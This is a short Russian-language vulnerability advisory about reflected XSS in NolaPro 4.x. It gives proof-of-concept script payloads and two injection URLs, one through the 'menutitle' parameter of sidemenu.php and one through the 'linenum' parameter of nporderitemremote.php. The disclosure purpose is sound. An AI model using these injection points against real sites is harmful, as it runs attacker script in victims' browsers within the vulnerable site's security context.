Программа: NolaPro 4.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "linenum" сценарием nporderitemremote.php. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.

Эксплоит:

<script>alert(String.fromCharCode(88,83,83,32,102,111,117,110,100,32,98,
121,32,67,111,114,101,108,97,110,32,84,101,97,109));</script>

 http://nolapro_server/sidemenu.php?index=1&menutitle=
%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,
32,98,121,32,67,111,114,101,108,97,110,32,84, 101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS

http://nolapro_server/nporderitemremote.php?pos_mode=1&currency=USD&curdate
=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,
98, 121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&inventorylocationid=1&customerid=&shiptoid=0



Оставить мнение